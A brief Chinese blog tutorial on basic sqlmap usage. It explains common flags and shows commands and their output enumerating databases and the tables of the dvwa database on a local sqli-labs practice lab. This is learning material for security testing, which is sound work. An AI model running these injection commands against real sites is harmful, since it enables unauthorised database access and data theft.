Sqlmap的基本使用

blog 190
Sqlmap的基本使用

0x01 命令讲解

-h   基本的帮助信息
-hh  详细的帮助信息
-u   指定url
--dbs 获取当前数据库的所有数据库
--batch 所有的选项都选择默认
-D 选中某个数据库
--tables 获取选中的数据库下的所有数据表名

0x02 实战讲解

0x02.1 获取所有数据库名

以下基于sql-labs的Less04讲解

点击我传送到判断当前注入类型的方法 这里不再讲解

sqlmap.py -u 'http://localhost/sql/Less-4/?id=1")' --dbs --batch

--dbs 获取所有数据库名
--batch 所有的选项都选择默认
Sqlmap的基本使用

根据结果我们可以看到它我们的url中存在报错注入(error-based)时间盲注(time-based blind)

获取的信息

web服务器中间件为Apache其版本为2.4.48

PHP版本5.6.40

Mysql数据库版本为 5.6

并且获取到了mysql数据库中的所有数据库名

available databases [9]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] sys
[*] wordpress

0x02.2 获取数据库的数据表

sqlmap.py -u 'http://localhost/sql/Less-4/?id=1")' --batch -D dvwa --tables

-D 指定数据库名

--tables 获取指定数据库名下的所有数据表
如果不使用-D指定某个数据库的情况下,可以使用--dbs配合--tables 获取所有数据库下的所有数据表

运行结果

Sqlmap的基本使用
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

分享